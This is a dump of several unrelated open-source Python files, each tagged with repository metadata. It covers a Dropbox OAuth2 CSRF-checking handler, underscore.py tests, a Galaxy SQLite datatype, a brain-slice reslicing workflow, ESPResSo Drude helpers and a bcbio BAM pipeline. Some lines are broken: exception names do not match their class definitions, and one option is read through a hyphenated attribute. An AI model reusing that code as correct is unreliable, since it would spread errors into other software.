raise self.BadRequestException("Neither query parameter 'code' or 'error' is set.")
# Check CSRF token
if csrf_token_from_session is None:
raise self.BadStateError("Missing CSRF token in session.")
if len(csrf_token_from_session) <= 20:
raise AssertionError("CSRF token unexpectedly short: %r" % (csrf_token_from_session,))
split_pos = state.find('|')
if split_pos < 0:
given_csrf_token = state
url_state = None
else:
given_csrf_token = state[0:split_pos]
url_state = state[split_pos+1:]
if not _safe_equals(csrf_token_from_session, given_csrf_token):
raise self.CsrfException("expected %r, got %r" % (csrf_token_from_session,
given_csrf_token))
del self.session[self.csrf_token_session_key]
# Check for error identifier
if error is not None:
if error == 'access_denied':
# The user clicked "Deny"
if error_description is None:
raise self.NotApprovedException("No additional description from Dropbox")
else:
raise self.NotApprovedException("Additional description from Dropbox: " +
error_description)
else:
# All other errors
full_message = error
if error_description is not None:
full_message += ": " + error_description
raise self.ProviderError(full_message)
# If everything went ok, make the network call to get an access token.
access_token, user_id = self._finish(code, self.redirect_uri)
return access_token, user_id, url_state
class BadRequestException(Exception):
"""
Thrown if the redirect URL was missing parameters or if the
given parameters were not valid.
The recommended action is to show an HTTP 400 error page.
"""
pass
class BadStateException(Exception):
"""
Thrown if all the parameters are correct, but there's no CSRF token in the session. This
probably means that the session expired.
The recommended action is to redirect the user's browser to try the approval process again.
"""
pass
class CsrfException(Exception):
"""
Thrown if the given 'state' parameter doesn't contain the CSRF
token from the user's session.
This is blocked to prevent CSRF attacks.
The recommended action is to respond with an HTTP 403 error page.
"""
pass
class NotApprovedException(Exception):
"""
The user chose not to approve your app.
"""
pass
class ProviderException(Exception):
"""
Dropbox redirected to your redirect URI with some unexpected error identifier and error
message.
The recommended action is to log the error, tell the user something went wrong, and let
them try again.
"""
pass
def _safe_equals(a, b):
if len(a) != len(b): return False
res = 0
for ca, cb in zip(a, b):
res |= ord(ca) ^ ord(cb)
return res == 0
_OAUTH2_ACCESS_TOKEN_PATTERN = re.compile(r'\A[-_~/A-Za-z0-9\.\+]+=*\Z')
# From the "Bearer" token spec, RFC 6750.
|
cogniteev/dropbox-python-sdk
|
dropbox/client.py
|
Python
|
mit
| 68,016
|
[
"VisIt"
] |
7452852880945e6065e19dcf0c3fe65f2129bacfc3a9b6d679a70934aa1d4307
|
import unittest
from src.underscore import _
from threading import Timer
class TestStructure(unittest.TestCase):
class Namespace:
pass
def test_bind(self):
pass
def test_bindAll(self):
pass
def test_memoize(self):
def fib(n):
return n if n < 2 else fib(n - 1) + fib(n - 2)
fastFib = _.memoize(fib)
self.assertEqual(
fib(10), 55, 'a memoized version of fibonacci'
' produces identical results')
self.assertEqual(
fastFib(10), 55, 'a memoized version of fibonacci'
' produces identical results')
self.assertEqual(
fastFib(10), 55, 'a memoized version of fibonacci'
' produces identical results')
self.assertEqual(
fastFib(10), 55, 'a memoized version of fibonacci'
' produces identical results')
def o(str):
return str
fastO = _.memoize(o)
self.assertEqual(o('upper'), 'upper', 'checks hasOwnProperty')
self.assertEqual(fastO('upper'), 'upper', 'checks hasOwnProperty')
def test_delay(self):
ns = self.Namespace()
ns.delayed = False
def func():
ns.delayed = True
_.delay(func, 150)
def checkFalse():
self.assertFalse(ns.delayed)
print("\nASYNC: delay. OK")
def checkTrue():
self.assertTrue(ns.delayed)
print("\nASYNC: delay. OK")
Timer(0.05, checkFalse).start()
Timer(0.20, checkTrue).start()
def test_defer(self):
ns = self.Namespace()
ns.deferred = False
def defertTest(bool):
ns.deferred = bool
_.defer(defertTest, True)
def deferCheck():
self.assertTrue(ns.deferred, "deferred the function")
print("\nASYNC: defer. OK")
_.delay(deferCheck, 50)
def test_throttle(self):
ns = self.Namespace()
ns.counter = 0
def incr():
ns.counter += 1
throttledIncr = _.throttle(incr, 100)
throttledIncr()
throttledIncr()
throttledIncr()
Timer(0.07, throttledIncr).start()
Timer(0.12, throttledIncr).start()
Timer(0.14, throttledIncr).start()
Timer(0.19, throttledIncr).start()
Timer(0.22, throttledIncr).start()
Timer(0.34, throttledIncr).start()
def checkCounter1():
self.assertEqual(ns.counter, 1, "incr was called immediately")
print("ASYNC: throttle. OK")
def checkCounter2():
self.assertEqual(ns.counter, 4, "incr was throttled")
print("ASYNC: throttle. OK")
_.delay(checkCounter1, 90)
_.delay(checkCounter2, 400)
def test_debounce(self):
ns = self.Namespace()
ns.counter = 0
def incr():
ns.counter += 1
debouncedIncr = _.debounce(incr, 120)
debouncedIncr()
debouncedIncr()
debouncedIncr()
Timer(0.03, debouncedIncr).start()
Timer(0.06, debouncedIncr).start()
Timer(0.09, debouncedIncr).start()
Timer(0.12, debouncedIncr).start()
Timer(0.15, debouncedIncr).start()
def checkCounter():
self.assertEqual(1, ns.counter, "incr was debounced")
print("ASYNC: debounce. OK")
_.delay(checkCounter, 300)
def test_once(self):
ns = self.Namespace()
ns.num = 0
def add():
ns.num += 1
increment = _.once(add)
increment()
increment()
increment()
increment()
self.assertEqual(ns.num, 1)
def test_wrap(self):
def greet(name):
return "hi: " + name
def wrap(func, name):
aname = list(name)
aname.reverse()
reveresed = "".join(aname)
return func(name) + ' ' + reveresed
backwards = _.wrap(greet, wrap)
self.assertEqual(backwards('moe'), 'hi: moe eom',
'wrapped the saluation function')
inner = lambda: "Hello "
obj = {"name": "Moe"}
obj["hi"] = _.wrap(inner, lambda fn: fn() + obj["name"])
self.assertEqual(obj["hi"](), "Hello Moe")
def test_compose(self):
def greet(name):
return "hi: " + name
def exclaim(sentence):
return sentence + '!'
def upperize(full):
return full.upper()
composed_function = _.compose(exclaim, greet, upperize)
self.assertEqual('HI: MOE!', composed_function('moe'),
'can compose a function that takes another')
def test_after(self):
def testAfter(afterAmount, timesCalled):
ns = self.Namespace()
ns.afterCalled = 0
def afterFunc():
ns.afterCalled += 1
after = _.after(afterAmount, afterFunc)
while (timesCalled):
after()
timesCalled -= 1
return ns.afterCalled
self.assertEqual(testAfter(5, 5), 1,
"after(N) should fire after being called N times")
self.assertEqual(testAfter(5, 4), 0,
"after(N) should not fire unless called N times")
self.assertEqual(testAfter(0, 0), 1,
"after(0) should fire immediately")
def test_partial(self):
def func(*args):
return ' '.join(args)
pfunc = _.partial(func, 'a', 'b', 'c')
self.assertEqual(pfunc('d', 'e'), 'a b c d e')
if __name__ == "__main__":
print("run these tests by executing `python -m unittest"
"discover` in unittests folder")
unittest.main()
|
serkanyersen/underscore.py
|
tests/test_functions.py
|
Python
|
mit
| 5,794
|
[
"MOE"
] |
bb623ca567d53d5eeb025b58931cedf7897699a9e52159022154998328fa33eb
|
import logging
from galaxy.datatypes.binary import Binary, SQlite
from galaxy.datatypes.metadata import MetadataElement, MetadataParameter
from galaxy.util import sqlite
log = logging.getLogger(__name__)
class GAFASQLite(SQlite):
"""Class describing a GAFA SQLite database"""
MetadataElement(name='gafa_schema_version', default='0.1.0', param=MetadataParameter, desc='GAFA schema version',
readonly=True, visible=True, no_value='0.1.0')
file_ext = 'gafa.sqlite'
def set_meta(self, dataset, overwrite=True, **kwd):
super(GAFASQLite, self).set_meta(dataset, overwrite=overwrite, **kwd)
try:
conn = sqlite.connect(dataset.file_name)
c = conn.cursor()
version_query = 'SELECT version FROM meta'
results = c.execute(version_query).fetchall()
if len(results) == 0:
raise Exception('version not found in meta table')
elif len(results) > 1:
raise Exception('Multiple versions found in meta table')
dataset.metadata.gafa_schema_version = results[0][0]
except Exception as e:
log.warn("%s, set_meta Exception: %s", self, e)
def sniff(self, filename):
if super(GAFASQLite, self).sniff(filename):
gafa_table_names = frozenset(['gene', 'gene_family', 'gene_family_member', 'meta', 'transcript'])
conn = sqlite.connect(filename)
c = conn.cursor()
tables_query = "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"
results = c.execute(tables_query).fetchall()
found_table_names = frozenset(_[0] for _ in results)
return gafa_table_names <= found_table_names
return False
# Since Binary.register_sniffable_binary_format() ignores the sniff order declared in datatypes_conf.xml and put TS datatypes at the end, instead of simply doing:
# Binary.register_sniffable_binary_format("sqlite", "sqlite", SQlite)
# we need to register specialized SQLite datatypes before SQlite
for i, format_dict in enumerate(Binary.sniffable_binary_formats):
if format_dict['class'] == SQlite:
break
else:
i += 1
Binary.sniffable_binary_formats.insert(i, {'type': 'gafa.sqlite', 'ext': 'gafa.sqlite', 'class': GAFASQLite})
|
PerlaTroncosoRey/tgac-galaxytools
|
tools/GAFA/gafa_datatypes.py
|
Python
|
mit
| 2,314
|
[
"Galaxy"
] |
c0cc322b8e8c8d0b06980f43671e5e39557edd615b417eabea3ac108991920f7
|
import os
import sys
import copy
import numpy as np
from scipy.interpolate import interp1d
from optparse import OptionParser, OptionGroup
from pos_parameters import filename_parameter, string_parameter, list_parameter, value_parameter, filename
from pos_wrapper_skel import generic_workflow
import pos_wrappers
class average_grayscale_images_list(pos_wrappers.generic_wrapper):
_template = """c{dimension}d -verbose \
{input_image_1} {input_image_2} \
-weighted-sum {weight_1} {weight_2} \
-o {output_image}"""
_parameters = {
'dimension' : value_parameter('dimension', 2),
'weight_1' : value_parameter('weight_1', None),
'weight_2' : value_parameter('weight_2', None),
'input_image_1': filename_parameter('input_image_1', None),
'input_image_2': filename_parameter('input_image_2', None),
'output_image' : filename_parameter('output_image', None)
}
class average_multichannel_images_list(pos_wrappers.generic_wrapper):
_template = """c{dimension}d -verbose \
-mcs {input_image_1} -popas iblue -popas igreen -popas ired -clear \
-mcs {input_image_2} -popas oblue -popas ogreen -popas ored -clear \
-clear \
-push iblue -push oblue -weighted-sum {weight_1} {weight_2} -type uchar -popas bblue \
-push igreen -push ogreen -weighted-sum {weight_1} {weight_2} -type uchar -popas bgreen \
-push ired -push ored -weighted-sum {weight_1} {weight_2} -type uchar -popas bred \
-clear \
-push bred -push bgreen -push bblue \
-omc 3 {output_image}"""
_parameters = {
'dimension' : value_parameter('dimension', 2),
'weight_1' : value_parameter('weight_1', None),
'weight_2' : value_parameter('weight_2', None),
'input_image_1': filename_parameter('input_image_1', None),
'input_image_2': filename_parameter('input_image_2', None),
'output_image' : filename_parameter('output_image', None)
}
class nonuniform_relice(generic_workflow):
"""
Workflow for mapping nonuniformly spaced slices to a regularly spaced gird.
python nonuniform_reslice.py \
--referenceCoordinates /home/pmajka/the_whole_brain_connectivity_atlas/data/merge/R601_reference_planes \
--probingCoordinates planes_reference \
--negateReferenceCoordinates \
--skipOutputVolumeGeneration \
--useMultichannelWorkflow \
--referenceInputDirectory /home/pmajka/the_whole_brain_connectivity_atlas/data/merge/R601/ \
--interpolation nearest \
--output-volume-scalar-type uchar \
--output-volume-spacing 0.017062 0.04 0.017062 \
--output-volume-origin -9.622 -7.92 1.444 \
--output-volume-permute-axes 0 2 1 \
--output-volume-orientation RAS \
--rgbVolumeFilename /home/pmajka/601.nii.gz
# --dry-run
# --cleanup
# --useGrayscaleWorkflow \
# --useGrayscaleWorkflow \
# --useMultichannelWorkflow \
# --outputWeightedSlicesDir /home/pmajka/ \
"""
_f = {
'ref_input': filename('ref_input', work_dir='01_reference_input', str_template='{idx:04d}.png'),
'ref_mask': filename('ref_mask', work_dir='02_reference_mask', str_template='{idx:04d}.png'),
'weighted_grayscale' : filename('weighted_grayscale', work_dir='04_weighted_grayscale', str_template='{idx:04d}.nii.gz'),
'weighted_multichannel' : filename('weighted_multichannel', work_dir='05_weighted_multichannel', str_template='{idx:04d}.nii.gz'),
'weighted_grayscale_mask' : filename('weighted_grayscale_mask', work_dir='04_weighted_grayscale', str_template='????.nii.gz'),
'weighted_multichannel_mask' : filename('weighted_multichannel_mask', work_dir='05_weighted_multichannel', str_template='%04d.nii.gz'),
'output_volumes' : filename('output_volumes', work_dir='10_output_volumes', str_template='output_volume.nii.gz'),
'tmp_gray_vol' : filename('tmp_gray_vol', work_dir='09_intermediate_results', str_template='__temp__vol.vtk'),
}
_usage = ""
CONST_NOSLICE_INDEX = 9998
def __init__(self, options, args, pool=None):
super(self.__class__, self).__init__(options, args, pool)
if not any([self.options.useMultichannelWorkflow,
self.options.useGrayscaleWorkflow]):
print >> sys.stderr, "No workflow type selected (either grayscale or multichannel). Exiting."
sys.exit(1)
if not all([self.options.probingCoordinates,
self.options.referenceCoordinates]):
print >> sys.stderr, "You need to provide file for both reference and probing coordinates. Exiting."
sys.exit(1)
if not self.options.referenceInputDirectory:
print >>sys.stderr, "No input slices directory. Please provide such. Exiting"
sys.exit(1)
else:
self.f['ref_input'].override_dir = self.options.referenceInputDirectory
# Override directories if customized directories names are provided
# Currntly, the only customizable directory is the output directory to
# for weighted slices .
if self.options.outputWeightedSlicesDir:
self.f['weighted_grayscale'].override_dir = self.options.outputWeightedSlicesDir
self.f['weighted_multichannel'].override_dir = self.options.outputWeightedSlicesDir
for out_type in (self.options.grayscaleVolumeFilename,\
self.options.rgbVolumeFilename):
if out_type:
self.f['output_volumes'].override_path = out_type
def launch(self):
# TODO: the script should be able to process the volumes instead of
# the extracted slices. Think about it :)
# At first load the coordinates of reference volume
# (the coordinates you map to)
self.coords_from = self.load_coordinates_from_file(
self.options.referenceCoordinates,
negate=self.options.negateReferenceCoordinates)
# Then load the probing coordinates
# (the coordinates you map from)
self.coords_to = self.load_coordinates_from_file(
self.options.probingCoordinates,
negate=self.options.negateProbingCoordinates)
# Select the workflow type (one can choose between RGB - multichannel workflow
# and classic, grayscale workflow).
# Process the source data according to the selected workflow,
if self.options.useMultichannelWorkflow:
self.reslice_generic(average_multichannel_images_list,
weighting_output_dir='weighted_multichannel')
self.prepare_output_multichannel_volume()
if self.options.useGrayscaleWorkflow:
self.reslice_generic(average_grayscale_images_list,
weighting_output_dir='weighted_grayscale')
self.prepare_output_grayscale_volume()
def load_coordinates_from_file(self, filename, negate=False):
#TODO: Whatever you want to read, read it with the CSV module.
# TODO: Add generic csv reader to the possum framework
# TODO: And simply refactor all the code so it will be using this
# refactored uniforma csv reader.
multiplier = [1, -1][negate]
coords = []
for line in open(filename).readlines():
coords.append(multiplier * float(line.strip()))
return np.array(coords)
def reslice_generic(self, reslice_command_wrapper=None, weighting_output_dir=None):
interpolation_data = \
self.interpolate(self.coords_from, self.coords_to,
kind=self.options.interpolation)
commands = []
for slice_idx, slice in enumerate(interpolation_data):
# print slice
o=self.options.startingSliceIndexOffset
command = reslice_command_wrapper(\
dimension = 2,
input_image_1 = self.f['ref_input'](idx=slice['slice_1']+o),
input_image_2 = self.f['ref_input'](idx=slice['slice_2']+o),
weight_1 = slice['weight_1'],
weight_2 = slice['weight_2'],
output_image = self.f[weighting_output_dir](idx=slice_idx))
commands.append(copy.deepcopy(command))
self.execute(commands)
def interpolate(self, coords_from, coords_to, kind='nearest'):
x = interp1d(coords_from, np.arange(coords_from.size), kind=kind)
results = []
for ref_coord in coords_to:
try:
i = ref_coord
ip = x(ref_coord)
# 'left' slice: slice_idx
# 'right' slice: slice_idx + 1
l_slice = int(ip)
r_slice = int(ip) + 1
r_weight = ip - int(ip)
l_weight = 1 - r_weight
# Avoid getting out of the range:
if r_slice > len(coords_from)-1:
r_slice = l_slice
# print i, l_slice, l_weight, r_slice, r_weight, len(coords_from)
slice_results = {'status': True, 'coord': i,
'slice_1': l_slice, 'weight_1': l_weight,
'slice_2': r_slice, 'weight_2': r_weight}
results.append(slice_results)
except:
slice_results = {'status': False, 'coord': i,
'slice_1': self.CONST_NOSLICE_INDEX, 'weight_1': 1.0,
'slice_2': self.CONST_NOSLICE_INDEX, 'weight_2': 1.0}
results.append(slice_results)
return results
def prepare_output_grayscale_volume(self):
stack_grayscale = pos_wrappers.stack_slices_gray_wrapper(
temp_volume_fn = self.f['tmp_gray_vol'](),
stack_mask = self.f['weighted_grayscale_mask'](),
permutation_order = self.options.output_volume_permute_axes,
orientation_code = self.options.output_volume_orientation,
output_type = self.options.output_volume_scalar_type,
spacing = self.options.output_volume_spacing,
origin = self.options.output_volume_origin,
interpolation = self.options.output-volume-interpolation,
resample = self.options.output_volume_resample,
output_volume_fn = self.f['output_volumes']())
self.execute_callable(stack_grayscale)
def prepare_output_multichannel_volume(self):
stack_multichannel = pos_wrappers.stack_slices_rgb_wrapper(
stack_mask = self.f['weighted_multichannel_mask'](),
slice_start= 0,
slice_end = len(self.coords_to)-1,
temp_volume_fn = self.f['tmp_gray_vol'](),
permutation_order = self.options.output_volume_permute_axes,
orientation_code = self.options.output_volume_orientation,
output_type = self.options.output_volume_scalar_type,
spacing = self.options.output_volume_spacing,
origin = self.options.output_volume_origin,
interpolation = self.options.output-volume-interpolation,
resample = self.options.output_volume_resample,
output_volume_fn = self.f['output_volumes']())
self.execute_callable(stack_multichannel)
# TODO: Rethink this in general.
# perhaps you want to have a module which
# simply puts section in a canvas?
@classmethod
def _getCommandLineParser(cls):
parser = generic_workflow._getCommandLineParser()
regSettings = \
OptionGroup(parser, 'Processing settings.')
regSettings.add_option('--referenceCoordinates', default=None,
type='str', dest='referenceCoordinates',
help='File with reference coordinates (the experimental one).')
regSettings.add_option('--negateReferenceCoordinates', default=False,
dest='negateReferenceCoordinates', action='store_const', const=True,
help="Negate values of the reference coordinates.")
regSettings.add_option('--probingCoordinates', default=None,
type='str', dest='probingCoordinates',
help='File with probing coordinates (the atlas one).')
regSettings.add_option('--negateProbingCoordinates', default=False,
dest='negateProbingCoordinates', action='store_const', const=True,
help="Negate values of the probing coordinates.")
regSettings.add_option('--interpolation', default='nearest', type='str',
dest='interpolation', help='Slice interpolation method <nearest|linear>')
regSettings.add_option('--referenceInputDirectory', default=None,
type='str', dest='referenceInputDirectory',
help='Input directory for reference slices (experimental slices).')
regSettings.add_option('--outputWeightedSlicesDir', default=None,
type='str', dest='outputWeightedSlicesDir',
help='Output directory for the weighted slices.')
regSettings.add_option('--useMultichannelWorkflow', default=False,
dest='useMultichannelWorkflow', action='store_const', const=True,
help="Use multichannel processing workflow.")
regSettings.add_option('--useGrayscaleWorkflow', default=False,
dest='useGrayscaleWorkflow', action='store_const', const=True,
help="Use grayscale processing workflow.")
regSettings.add_option('--skipOutputVolumeGeneration', default=False,
dest='skipSlicePreprocess', action='store_const', const=True,
help='Skip slice preprocessing.')
regSettings.add_option('--startingSliceIndexOffset', default=0, type="int",
dest='startingSliceIndexOffset', action='store',
help='Indicates index of the first image.')
outputVolumeSettings = \
OptionGroup(parser, 'OutputVolumeSettings.')
outputVolumeSettings.add_option('--output-volume-origin', dest='output_volume_origin',
default=[0.,0.,0.], action='store', type='float', nargs =3, help='')
outputVolumeSettings.add_option('--output-volume-scalar-type', default='uchar',
type='str', dest='output_volume_scalar_type',
help='Data type for output volume\'s voxels. Allowed values: char | uchar | short | ushort | int | uint | float | double')
outputVolumeSettings.add_option('--output-volume-spacing', default=[1,1,1],
type='float', nargs=3, dest='output_volume_spacing',
help='Spacing of the output volume in mm (both grayscale and color volume).')
outputVolumeSettings.add_option('--output-volume-resample',
dest='output_volume_resample', type='float', nargs=3, default=None,
help='Apply additional resampling to the volume')
outputVolumeSettings.add_option('--output-volume-permute-axes', default=[0,1,2],
type='int', nargs=3, dest='output_volume_permute_axes',
help='Apply axes permutation. Permutation has to be provided as sequence of 3 integers separated by space. Identity (0,1,2) permutation is a default one.')
outputVolumeSettings.add_option('--output-volume-orientation', dest='output_volume_orientation', type='str',
default='RAS', help='')
outputVolumeSettings.add_option('--grayscale-volume-filename', dest='grayscaleVolumeFilename',
type='str', default=None)
outputVolumeSettings.add_option('--rgbVolumeFilename', dest='rgbVolumeFilename',
type='str', default=None)
outputVolumeSettings.add_option('--output-volume-interpolation',
dest='output_volume_interpolation', type='str', default=None,
help='<NearestNeighbor|Linear|Cubic|Sinc|Gaussian>')
parser.add_option_group(regSettings)
parser.add_option_group(outputVolumeSettings)
return parser
if __name__ == '__main__':
options, args = nonuniform_relice.parseArgs()
d = nonuniform_relice(options, args)
d.launch()
|
pmajka/poSSum
|
possum/nonuniform_reslice.py
|
Python
|
mit
| 16,642
|
[
"Gaussian",
"VTK"
] |
e7a1ad9762b6b0bee7a2e12223723045b08955a221dbdece34c1a3e36c812558
|
# Copyright (C) 2010-2018 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import espressomd.interactions
from espressomd import has_features
# Dict with Drude type infos
drude_dict = {}
# Lists with unique Drude and core types
core_type_list = []
drude_type_list = []
# Get core id from Drude id
core_id_from_drude_id = {}
# Drude IDs
drude_id_list = []
def add_drude_particle_to_core(system, harmonic_bond, thermalized_bond,
p_core, id_drude, type_drude, alpha,
mass_drude, coulomb_prefactor,
thole_damping=2.6, verbose=False):
"""
Adds a Drude particle with specified id, type, and mass to the system.
Checks if different Drude particles have different types.
Collects types/charges/polarizations/Thole factors for intramol. core-Drude short-range exclusion and Thole interaction.
Attributes
----------
system : Instance of :attr:`espressomd.system.System`
harmonic_bond: This method adds this harmonic bond to between Drude particle and core
thermalized_bond: This method adds this thermalized_bond to between Drude particle and core
p_core: The existing core particle
id_drude: :obj:`int`
This method creates the Drude particle and assigns this id.
type_drude: :obj:`int`
The type of the newly created Drude particle
alpha : :obj:`float`
The polarizability in units of inverse volume. Related to the charge of the Drude particle.
mass_drude : :obj:`float`
The mass of the newly created Drude particle
coulomb_prefactor : :obj:`float`
Required to calculate the charge of the Drude particle.
thole_damping : :obj:`float`
Thole damping factor of the Drude pair. Comes to effect if add_all_thole() method is used.
verbose : :obj:`bool`
Turns on verbosity.
"""
k = harmonic_bond.params["k"]
q_drude = -1.0 * pow(k * alpha / coulomb_prefactor, 0.5)
if has_features("PARTICLE_ANISOTROPY"):
gamma_off = [0.0, 0.0, 0.0]
else:
gamma_off = 0.0
system.part.add(id=id_drude, pos=p_core.pos, type=type_drude,
q=q_drude, mass=mass_drude, temp=0, gamma=gamma_off)
if verbose:
print(
"Adding to core", p_core.id, "drude id", id_drude, " pol", alpha,
" core charge", p_core.q, "->", p_core.q - q_drude, " drude charge", q_drude)
p_core.q -= q_drude
p_core.mass -= mass_drude
p_core.add_bond((harmonic_bond, id_drude))
p_core.add_bond((thermalized_bond, id_drude))
p_core.temp = 0.0
p_core.gamma = gamma_off
if type_drude in drude_dict and not (drude_dict[type_drude]["q"] == q_drude and drude_dict[type_drude]["thole_damping"] == thole_damping):
raise Exception(
"Drude particles with different drude charges have to have different types for THOLE")
core_id_from_drude_id[id_drude] = p_core.id
# Add new Thole nonbonded interaction for D-D, D-C, C-C for all existing
# Drude types if this type is seen for the first time
if not type_drude in drude_dict:
# Bookkeeping of q, alphas and damping parameter
drude_dict[type_drude] = {}
drude_dict[type_drude]["q"] = q_drude
drude_dict[type_drude]["qc"] = p_core.q
drude_dict[type_drude]["alpha"] = alpha
drude_dict[type_drude]["thole_damping"] = thole_damping
drude_dict[type_drude]["core_type"] = p_core.type
# Save same information to get access to the parameters via core types
drude_dict[p_core.type] = {}
drude_dict[p_core.type]["q"] = -q_drude
drude_dict[p_core.type]["qc"] = p_core.q
drude_dict[p_core.type]["alpha"] = alpha
drude_dict[p_core.type]["thole_damping"] = thole_damping
drude_dict[p_core.type]["drude_type"] = type_drude
# Collect unique Drude types
if not type_drude in drude_type_list:
drude_type_list.append(type_drude)
# Collect unique core types
if not p_core.type in core_type_list:
core_type_list.append(p_core.type)
# Collect unique Drude ids
if not id_drude in drude_id_list:
drude_id_list.append(id_drude)
def add_thole_pair_damping(system, t1, t2, verbose=False):
"""
Calculates mixed Thole factors depending on Thole damping and polarization.
Adds non-bonded Thole interactions to the system.
Attributes
----------
system : Instance of :attr:`espressomd.system.System`
t1 : :obj:`int`
Type 1
t2 : :obj:`int`
Type 2
verbose : :obj:`bool`
Turns on verbosity.
"""
qq = drude_dict[t1]["q"] * drude_dict[t2]["q"]
s = 0.5 * (drude_dict[t1]["thole_damping"] + drude_dict[t2]["thole_damping"]
) / (drude_dict[t1]["alpha"] * drude_dict[t2]["alpha"])**(1.0 / 6.0)
system.non_bonded_inter[t1, t2].thole.set_params(scaling_coeff=s, q1q2=qq)
if verbose:
print("Added THOLE non-bonded interaction for types",
t1, "<->", t2, "S", s, "q1q2", qq)
def add_all_thole(system, verbose=False):
"""
Calls add_thole_pair_damping() for all necessary combinations to create the interactions.
Attributes
----------
system : Instance of :attr:`espressomd.system.System`
verbose : :obj:`bool`
Turns on verbosity.
"""
# Drude <-> Drude
for i in range(len(drude_type_list)):
for j in range(i, len(drude_type_list)):
add_thole_pair_damping(
system, drude_type_list[i], drude_type_list[j], verbose)
# core <-> core
for i in range(len(core_type_list)):
for j in range(i, len(core_type_list)):
add_thole_pair_damping(
system, core_type_list[i], core_type_list[j], verbose)
# Drude <-> core
for i in drude_type_list:
for j in core_type_list:
add_thole_pair_damping(system, i, j, verbose)
def setup_and_add_drude_exclusion_bonds(system, verbose=False):
"""
Creates electrostatic short-range exclusion bonds for global exclusion
between Drude particles and core charges and adds the bonds to the cores.
Has to be called once after all Drude particles have been created.
Attributes
----------
system : Instance of :attr:`espressomd.system.System`
verbose: :obj:`bool`
Turns on verbosity.
"""
# All Drude types need...
for td in drude_type_list:
#...exclusions with core
qd = drude_dict[td]["q"] # Drude charge
qc = drude_dict[td]["qc"] # Core charge
subtr_sr_bond = espressomd.interactions.BondedCoulombSRBond(
q1q2=-qd * qc)
system.bonded_inter.add(subtr_sr_bond)
drude_dict[td]["subtr_sr_bonds_drude-core"] = subtr_sr_bond
if verbose:
print("Added drude-core SR exclusion bond ",
subtr_sr_bond, "for drude", qd, "<-> core", qc, "to system")
for drude_id in drude_id_list:
core_id = core_id_from_drude_id[drude_id]
pd = system.part[drude_id]
pc = system.part[core_id]
bond = drude_dict[pd.type]["subtr_sr_bonds_drude-core"]
pc.add_bond((bond, drude_id))
if verbose:
print("Added drude-core SR bond", bond,
"between ids", drude_id, "and", core_id)
def setup_intramol_exclusion_bonds(system, mol_drude_types, mol_core_types,
mol_core_partial_charges, verbose=False):
"""
Creates electrostatic short-range exclusion bonds for intramolecular exclusion
between Drude particles and partial charges of the cores. Has to be called once
after all Drude particles have been created.
Attributes
----------
system : Instance of :attr:`espressomd.system.System`
mol_drude_types : List of types of Drude particles within the molecule
mol_core_types : List of types of core particles within the molecule
mol_core_partial_charges : List of partial charges of core particles within the molecule
verbose : :obj:`bool`
Turns on verbosity.
"""
# All Drude types need...
for td in mol_drude_types:
drude_dict[td]["subtr_sr_bonds_intramol"] = {}
#... sr exclusion bond with other partial core charges...
for tc, qp in zip(mol_core_types, mol_core_partial_charges):
#...excluding the Drude core partner
if drude_dict[td]["core_type"] != tc:
qd = drude_dict[td]["q"] # Drude charge
subtr_sr_bond = espressomd.interactions.BondedCoulombSRBond(
q1q2=-qd * qp)
system.bonded_inter.add(subtr_sr_bond)
drude_dict[td]["subtr_sr_bonds_intramol"][
tc] = subtr_sr_bond
if verbose:
print("Added intramolecular exclusion", subtr_sr_bond,
"for drude", qd, "<-> core", qp, "to system")
def add_intramol_exclusion_bonds(system, drude_ids, core_ids, verbose=False):
"""
Applies electrostatic short-range exclusion bonds for the given ids.
Has to be applied for all molecules.
Attributes
----------
system : Instance of :attr:`espressomd.system.System`
drude_ids : IDs of Drude particles within a molecule.
core_ids : IDs of core particles within a molecule.
verbose : :obj:`bool`
Turns on verbosity.
"""
for drude_id in drude_ids:
for core_id in core_ids:
if core_id_from_drude_id[drude_id] != core_id:
pd = system.part[drude_id]
pc = system.part[core_id]
bond = drude_dict[pd.type][
"subtr_sr_bonds_intramol"][pc.type]
pd.add_bond((bond, core_id))
if verbose:
print("Added subtr_sr bond", bond,
"between ids", drude_id, "and", core_id)
|
mkuron/espresso
|
src/python/espressomd/drude_helpers.py
|
Python
|
gpl-3.0
| 10,675
|
[
"ESPResSo"
] |
74011832dfce3aabcca09d85b3c70211f0a78dc804f0ee561fc1ff54883e45e6
|
"""Pipeline functionality shared amongst multiple analysis types.
"""
import os
from contextlib import closing, contextmanager
import functools
import tempfile
import pysam
from bcbio import bam, broad, utils
from bcbio.pipeline import config_utils
from bcbio.utils import file_exists, safe_makedir, save_diskspace
from bcbio.distributed.transaction import file_transaction, tx_tmpdir
from bcbio.provenance import do
# ## Split/Combine helpers
def combine_bam(in_files, out_file, config):
"""Parallel target to combine multiple BAM files.
"""
runner = broad.runner_from_config(config)
runner.run_fn("picard_merge", in_files, out_file)
for in_file in in_files:
save_diskspace(in_file, "Merged into {0}".format(out_file), config)
bam.index(out_file, config)
return out_file
def process_bam_by_chromosome(output_ext, file_key, default_targets=None, dir_ext_fn=None):
"""Provide targets to process a BAM file by individual chromosome regions.
output_ext: extension to supply to output files
file_key: the key of the BAM file in the input data map
default_targets: a list of extra chromosome targets to process, beyond those specified
in the BAM file. Useful for retrieval of non-mapped reads.
dir_ext_fn: A function to retrieve a directory naming extension from input data map.
"""
if default_targets is None:
default_targets = []
def _do_work(data):
bam_file = data[file_key]
out_dir = os.path.dirname(bam_file)
if dir_ext_fn:
out_dir = os.path.join(out_dir, dir_ext_fn(data))
out_file = os.path.join(out_dir, "{base}{ext}".format(
base=os.path.splitext(os.path.basename(bam_file))[0],
ext=output_ext))
part_info = []
if not file_exists(out_file):
work_dir = safe_makedir(
"{base}-split".format(base=os.path.splitext(out_file)[0]))
with closing(pysam.Samfile(bam_file, "rb")) as work_bam:
for chr_ref in list(work_bam.references) + default_targets:
chr_out = os.path.join(work_dir,
"{base}-{ref}{ext}".format(
base=os.path.splitext(os.path.basename(bam_file))[0],
ref=chr_ref, ext=output_ext))
part_info.append((chr_ref, chr_out))
return out_file, part_info
